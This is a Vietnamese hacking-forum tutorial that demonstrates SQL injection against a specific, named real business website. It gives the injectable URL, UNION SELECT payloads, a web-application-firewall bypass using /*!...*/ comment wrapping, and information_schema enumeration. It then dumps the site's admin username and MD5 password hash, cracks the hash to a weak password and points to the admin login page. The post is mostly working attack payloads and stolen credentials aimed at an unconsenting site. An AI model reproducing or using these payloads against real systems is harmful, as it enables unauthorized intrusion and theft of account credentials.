http://forum.vnhack.us/showthread.php?t=920
thấy bạn mr_knight1997 có đưa lên cái site nhờ anh em trong forum giúp,tính vào coi thử xem sao,ai ngờ các pro nhanh chân lụm sạch rồi,nên chỉ đành viết đại cái tut này hướng dẫn newbie như mình học bypass cơ bản( pro đừng quăng gạch em nha)
bắt đầu nha!
link lỗi:
HTML Code:
http://nutranghuongphat.com/index.php?tab=4&subtab=26&id=141
HTML Code:
http://nutranghuongphat.com/index.php?tab=4&subtab=26&id=141'
xóa dấu ' rồi order by đếm field thôi
HTML Code:
http://nutranghuongphat.com/index.php?tab=4&subtab=26&id=141 order by 1--
....
HTML Code:
http://nutranghuongphat.com/index.php?tab=4&subtab=26&id=141 order by 9--
OK,vậy là có 8 field nhá
tìm field lỗi xem nào
HTML Code:
http://nutranghuongphat.com/index.php?tab=4&subtab=26&id=141 union select 1,2,3,4,5,6,7,8--
h mình thêm /*!...*/ vô nha
HTML Code:
http://nutranghuongphat.com/index.php?tab=4&subtab=26&id=141 /*!union*/ /*!select*/ 1,2,3,4,5,6,7,8--
2,3,4,7,8 --> ai thích số nào thì chơi số đó nha,ở đây mình chọn đại số 2
mình thì quen chỉ check ver thôi,khỏi DB +user (pro đừng chém em)
HTML Code:
http://nutranghuongphat.com/index.php?tab=4&subtab=26&id=141 /*!union*/ /*!select*/ 1,version(),3,4,5,6,7,8--
tiếp phần vui đây,get table nhá
HTML Code:
http://nutranghuongphat.com/index.php?tab=4&subtab=26&id=141 /*!union*/ /*!select*/ 1,group_concat(table_name),3,4,5,6,7,8 from information_schema.tables where table_schema=database()--
Lại bị 406 Not Acceptable nữa àk
tìm coi nó chặn cái gì nhá
HTML Code:
http://nutranghuongphat.com/index.php?tab=4&subtab=26&id=141 /*!union*/ /*!select*/ 1,/*!group_concat*/(/*!table_name*/),3,4,5,6,7,8 from information_schema./*!tables*/ where table_schema=database()--
àk thì ra nó chặn group_concat
vậy mình dùng concat thôi cũng được,mặc dù nó không liên kết vào 1 dòng
HTML Code:
http://nutranghuongphat.com/index.php?tab=4&subtab=26&id=141 /*!union*/ /*!select*/ 1,concat(/*!table_name*/),3,4,5,6,7,8 from information_schema./*!tables*/ where table_schema=database()--
ta chỉ cần để ý cái table "admin" thôi nhá
h có table name rồi thì tất nhiên ta phải đi tìm column name
đi hex cái "admin" ra trước đã
admin = 61646d696e
thêm vào 0x trước cái dãy hex đó nhá
HTML Code:
http://nutranghuongphat.com/index.php?tab=4&subtab=26&id=141 /*!union*/ /*!select*/ 1,concat(/*!column_name*/),3,4,5,6,7,8 from information_schema./*!columns*/ where table_name=0x61646d696e--
àk thì ra quên bypass chỗ table_name
thêm /*!...*/ vào nha các bạn
HTML Code:
http://nutranghuongphat.com/index.php?tab=4&subtab=26&id=141 /*!union*/ /*!select*/ 1,concat(/*!column_name*/),3,4,5,6,7,8 from information_schema./*!columns*/ where /*!table_name*/=0x61646d696e--
khai thác user+pass thôi là được rồi
HTML Code:
http://nutranghuongphat.com/index.php?tab=4&subtab=26&id=141 /*!union*/ /*!select*/ 1,concat(/*!username,0x2f,password*/),3,4,5,6,7,8 from admin--
nên khi coi các tut khác ,có nhiều pro sử dụng các dấu như ","(0x2c) ":"(0x3a)..v..v.. thì cũng đừng hỏi là gì mà hãy tự dịch mã hex đi nhé
àk quên mất mục đích chính ,dag khai thác mà nói nhiều quá,sr
sau khi thực hiện câu lệnh trên ta được :
adminoto/e10adc3949ba59abbe56e057f20f883e
adminoto :username của admin
e10adc3949ba59abbe56e057f20f883e : pass của admin ,decrypt md5 ra được là 123456
(thằng admin để pass vui tính nhỉ)h chỉ còn tìm link admin thôi
HTML Code:
http://nutranghuongphat.com/admin/login.php
HTML Code:
http://www.string-functions.com/string-hex.aspx
P/S :lần đầu làm tut có sai sót gì mong mọi người bỏ qua nhé,cứ nhiệt tình góp ý ,mình luôn tiếp nhận mọi ý kiến
!!
